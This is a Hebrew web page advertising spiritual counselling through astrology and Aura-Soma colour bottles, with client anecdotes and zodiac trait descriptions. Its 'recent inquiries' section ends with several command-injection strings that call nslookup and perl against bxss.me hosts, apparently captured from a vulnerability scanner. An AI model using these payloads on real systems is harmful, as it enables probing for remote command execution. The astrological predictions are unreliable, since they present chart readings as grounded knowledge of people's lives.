קבלו יעוץ מהיר ובחינם!

מפגשים וייעוצים רוחניים

ייעוצים רוחניים בחלל הפנוי

"אין לך כל עשב ועשב, שאין לו מזל ברקיע, שמכה אותו ואומר לו גדל" (מדרש בראשית רבה פרשה י')   

מהו החלל הפנוי?

החלל הפנוי הוא ביטוי שמגיע מעולם הקבלה היהודי, משמעותו שהאל שמילא את כל העולם מקצה עד קצה, צמצם את עצמו על מנת לברוא את העולם, בצמצום זה הוא יצר את החלל הפנוי.

באופן מקביל בכדי לברוא עולם יש ליצור חלל פנוי, חלל פנוי מתפיסות קדומות על איך, ומי, מה מקובל ונורמלי. החלל הפנוי מאפשר לבדוק את הדברים ממבט על.

מבט העל מתייחס לשני דרכי איבחון, האחת המפה האסטרולוגית שמספרת סיפור ומציעה פיתרון, והשניה בקבוקי האור והצבע של ה"אורה סומא" שגם מספרים סיפור ובעיקר את האמת האוביקטיבית של האדם עצמו.

איך הייעוצים מתבצעים?

במספר פגישות (4-6) תלמד/י להכיר את אישיותך ואת נקודות העוצמה שלך המתבטאים דרך המפה האסטרולוגית.

נקודות אור אלו יסייעו לך למקד את היכולות שלך, להתחבר לאישיותך הייחודית, להבין טוב יותר את מסע חייך, להשלים עם אירועים בחיים ולשחרר אותם למקום של תיקון, השראה ומחילה.

המפה האסטרולוגית עוזרת להבין את השיעור שעלינו ללמוד דרך 2 זמנים:

זמן הלידה - מייצג את האישיות העיקרית שלי.

זמן ההוה - מייצג את ההשתנות במרחב הזמן.

והחיבור בין שניהם.

בקבוקי ה"אורה סומא" דרך האיזון באור וצבע, מספרים על מקום התפתחות נשמתו של האדם ברגע זה, את המקום הזה רק האדם יודע, ידע זה מועבר דרך בחירת בקבוקי ריפוי באור וצבע. (ניתן לקרוא בהרחבה על שיטת האורה סומא בקישור זה.)

בחכמת המזרח הרחוק הנקראת "דאו" (במשמעות דרך ), האדם צריך להתחבר לדרך שלו, דרך שאינה משיקה לדרך של אדם אחר, ובחייו עליו לזהות ולהכיר את הדאו. כשאדם הולך בדאו שלו, בדרך שלו ( במפה האסטרולוגית זה מתבטא ביום ושעת הלידה), הוא מממש את המטרה שלשמה הוא בא לעולם.

התפקיד שלי דרך הכלים של המפה האסטרולוגית וה"אורה סומא", זה להכיר בפניך את הדאו שלך, להזכיר לך את מה שאת/ה יודע/ת ושכחת בדרך.

מעניין לראות שגם בחוכמת המזרח הרחוק דובר על חלל ריק כעל מקום המכיל בריקותו את מלוא הפוטנציאל, המקום הריק, מלא השאלות, הספקות החיפוש, אי הוודאות, המקום שהוא חציו שטח הפקר וחציו ארמון של מלך הופכים את המסע למרתק.

דוגמאות לייעוץ רוחני:

גיא, בן 24 , הגיע לייעוץ רוחני ללא סיבה מיוחדת. תוך כדי השיחה הוא העלה את הנושא שיש לו קונפליקט, מצד אחד חשוב לו להרשים אנשים ולהיות גבר גבר כמו שכתוב בהגדרות הספר, מצד שני יש בו רגישות גבוהה שמקשה עליו.

במפה האסטרולוגית ראיתי שכוכב מאדים, שאחראי על הפעולות שלנו והיוזמות שלנו ובמפה של גבר היא משמעותית מאוד, במפת הלידה של גיא נמצא במזל דגים, כלומר כל הפעולות של גיא הן רוחניות מלאות חמלה,הוא אינו מחפש מלחמות.

וזה היה מוזר כי כל חייו, גיא מספר, הוא נלחם, בצבא הוא שירת בסיירת צנחנים, אחר"כ היה קב"ט ביטחון, ועכשיו הוא מנסה להתקבל לשב"כ, ולמה כל זאת? כי הוא מרגיש שהרגישות שלו זה סוג של חולשה שלא מתאימה לדרישה החברתית ולגבר בפרט במציאות הישראלית. בכמה מפגשים עמדנו על התחושות הרגשות והרצונות האמיתיים של גיא, אחרי כמה חודשים גיא החליט לווסת את כל היוזמות שלו לאיכויות המולדות שלו, ואת החמלה והאהבה שיש בו הוא הפנה לריפוי, וללימודי רפואה משלימה.

אלי בחור בן 26 הגיע לייעוץ אחרי מות אביו, הוא היה שבור ומתוסכל ובעיקר עצוב. התבוננתי במפה שלו ובבחירת בקבוקי הריפוי של האור והצבע ( אורה סומא), ואמרתי לו שבשנה הזו יש לו סיכוי טוב להכיר את בת הזוג שלו בחיים. הוא ענה לי שאין לו הרבה ניסיון עם נשים, ושעכשיו במצבו הרגשי הוא לא פתוח לזה.

נפגשנו עוד מספר פעמים ונפרדנו לשלום... אחרי חצי שנה פגשתי את אלעד במקרה ברחוב בת"א, כששאלתי לשלומו הוא ענה שעוד חצי שנה הוא מתחתן, חייכתי ואמרתי: האם אתה זוכר שהצעתי לך להקשיב ללב שלך השנה כי זוגיות בהחלט באה בחשבון? הוא חייך, נזכר ואמר..נכון !

אלעד וסיוון באו אלי כזוג לייעוץ לפני נישואין. סיוון חששה שיש לאלעד התקפי זעם מתחת לאישיותו הרגועה, ורצתה לדעת מה לעשות. התבוננתי במפות שלהם, זוג מקסים ואוהב, אכן יש לאלעד נטיה לאגרסיה מודחקת, מארס כוכב העשיה האנרגיה והזעם נמצא בבית 12 שהוא בית התת מודע. מיקום זה יכול להצביע שאלעד אוגר בשקט כעסים לא עושה רעש, מרגיש בבטן הרי געש, עד שהוא מתפוצץ. כיוונתי את אלעד וסיוון איך להתמודד עם איכות אנרגטית מסוג זה, לנושא זה יש השלכות נוספות משום שאלעד הוא עוסק עצמאי, וכאשר כוכב מארס נמצא בבית 12 לעיתים היוזמה שלך לא מצליחה להוליד את עצמה והיא יכולה להביא את האדם לתיסכולים רבים. אחרי 8 חודשים אלעד וסיוון סיפרו לי שהם מתחתנים .

כתבות בנושא:

צדק במזל קשת (2007)

צדק במזל גדי  (2008)

ריפוי קו הזמן

אורה סומא - ריפוי באור וצבע


כול אדם נולד בשעה ובמקום בו הוא בחר להיוולד.
אין מיקריות על פני האדמה ,
על כן נאמר :
"נולד בשעה טובה ובמזל טוב ."

מ קום    ז מן    ל היות

משמע: להיות במקום הנכון , בזמן הנכון ,על מנת לעשות את הדבר הנכון והטבעי שלשמו נולדנו... ותמיד המקום בו אנו נמצאים הוא המקום הטוב ביותר עבורנו להתפתחות תודעתנו ונשמתנו.

השמש במפה אסטרולוגית ,(זהו הסימן של המזל בו נולדנו והיכן שהשמש נכחה במרחב השמימי בעת לידתנו) , מייצגת את התודעה, את המהות, החיוניות שעלינו לממש ואליה עלינו להגיע ולהתמזג עימה.

זו התפתחות התודעה שלנו במשך השנים – להביא את האור הפנימי החיוני שלנו אל העולם, השמש היא ספירת תפארת בקבלה ,והאיבר המייצג אותה הוא הלב, אם כן , כשאנו מביאים וממשים את האור ששוכן בתוכנו, אנו פועלים ע"פ צו הלב , הולכים אחרי הלב , והופכים לתפארת הבריאה, מקרינים את היופי האלוהי שזורח בתוכנו אל עבר הסביבה, אנו מוארים ע"י אור מבורך.

זה איננו דבר מובן מאליו , אך על האדם כיצור תבוני בעל דעת ובינה , ללמוד איכות זו בהתעוררות מושלמת בכול דרך ומשעול בחייו, וכול זאת על מנת להתאחד עם האחד והמקום, בכדי למזג את האורות עם הכלים כמעשה בראשית.

אסטרולוגיה בעיניי בראש ובראשונה זה כלי להבנה ופיתוח מודעות עצמית, ורק אח"כ כלי חיזוי, אם נשכיל ונביא את האדם חזרה לעצמו, מאחר ורוב הזמן אנו לא באמת עצמנו אלא עונים על ציפיות החברה והסביבה שאליה אנו שייכים, הרי לא נצטרך לעשות דבר, האדם כיצור תבוני יודע לבדו את הדרך של חייו, ועל כן הוא ידע באיזה שביל לפסוע ללא עזרה.

רק כשאנו  קשובים לקול הלב ולשמש הזורחת בליבנו אנו לא חוטאים ומחטיאים את המטרה שלשמה נולדנו. וללב העניין בסוף כול השבילים והדרכים אנו מבינים כי אין אנו צריכים לתקן שום דבר, אנו מושלמים כמו שנולדנו ביום בריאתנו, כול אחד באופן הייחודי לו, אין צורך להשיק דרכים, כול מה שאנו צריכים זה לעורר את איכות הלב, לחזור למהות ולעוצמה ששוכנת בתוכנו פנימה וכך ללא מעשה הכול מעצמו יעשה.

ואמא אומרת "כול אחד והמזל שלו"...(מתייחס לכוכב שמש במפה האסטרולוגית)

מזל טלה: אנרגטי, פעלתן, יוזם, עצמאי, מהיר פעולה, אמיץ, מנהיג, אוהב להימצא בראש הדברים ולהוביל אותם.

מזל שור: מעשי, זהיר, מופנם, מחפש ביטחון בדברים ארציים, בעל סבלנות, אוהב דברים יפים ומתוקים.

מזל תאומים: תקשורתי, מסתגל בקלות, מוחצן, חסר מנוחה, בעל ידע במגוון נושאים, הילד הנצחי.

מזל סרטן: רגשי, פעיל, מופנם, אוהב את הבית והמשפחה, בעל אינטואיציה ודימיון, נוסטלגי, מחובר לרגשותיו.

מזל אריה: אנרגטי, זהיר, יציב ומוחצן, בעל כושר מנהיגות ויכולת תאטרלית ודרמטית, נדיב ואמיץ, בעל רגשות חמים.

מזל בתולה: מעשי, מסתגל, מופנם, אנליטי מתעסק עם פרטים קטנים, צנוע, אוהב סדר הענקת שירות וטיפול בגוף ובבריאות.

מזל מאזניים: תקשורתי, פעיל, מוחצן, שואף להרמוניה ולשיתוף פעולה, בעל עדינות חן וקסם אישי רב.

מזל עקרב: מזל רגשי, זהיר, מופנם, רגשות סוערים, פועל מתוך אינטואיציה, מתוך רצון לדעת את עומק הדברים, נאמן.

מזל קשת: אנרגטי, מסתגל, מוחצן, אוהב טיולים ומסעות, ללמוד פילוסופיה ולהישאר חופשי, בעל קשר חזק לטבע, אופטימי.

מזל גדי: מעשי, פעיל, מופנם, בעל משמעת ושאפתנות, יציב וזקוק לביטחון ומעמד חברתי, נאמן.

מזל דלי: תקשורתי, אינטלקטואלי, אוהב מודרניות וטכנולוגיה חדישה, זקוק לקבוצה, אוהב חופש ולשבור מסגרות חשיבה, שואף לעזור לאנושות.

מזל דגים: רגשי, מסתגל, מופנם, בעל רגישות גבוהה ואמפתיה רבה, בעל דימיון מפותח והקרבה אישית, רומנטי, ואומנותי.

פניות אחרונות
;(nslookup hitlmjyfkkqnqcb850.bxss.me||perl -e "gethostbyname('hitlmjyfkkqnqcb850.bxss.me')")|(nslookup hitlmjyfkkqnqcb850.bxss.me||perl -e "gethostbyname('hitlmjyfkkqnqcb850.bxss.me')")
שדה תעופה בן גוריון
11/08/2022 16:28:22
`(nslookup hityrthinndwn6a237.bxss.me||perl -e "gethostbyname('hityrthinndwn6a237.bxss.me')")`
שדה תעופה בן גוריון
11/08/2022 16:28:21
|(nslookup hitwvdhefoscga115b.bxss.me||perl -e "gethostbyname('hitwvdhefoscga115b.bxss.me')")
שדה תעופה בן גוריון
11/08/2022 16:28:21
/xfs.bxss.me
שדה תעופה בן גוריון
11/08/2022 16:28:20
$(nslookup hitrhfllscjir6fc87.bxss.me||perl -e "gethostbyname('hitrhfllscjir6fc87.bxss.me')")
שדה תעופה בן גוריון
11/08/2022 16:28:20
(nslookup hityyyjpyvfnm42e80.bxss.me||perl -e "gethostbyname('hityyyjpyvfnm42e80.bxss.me')")
שדה תעופה בן גוריון
11/08/2022 16:28:20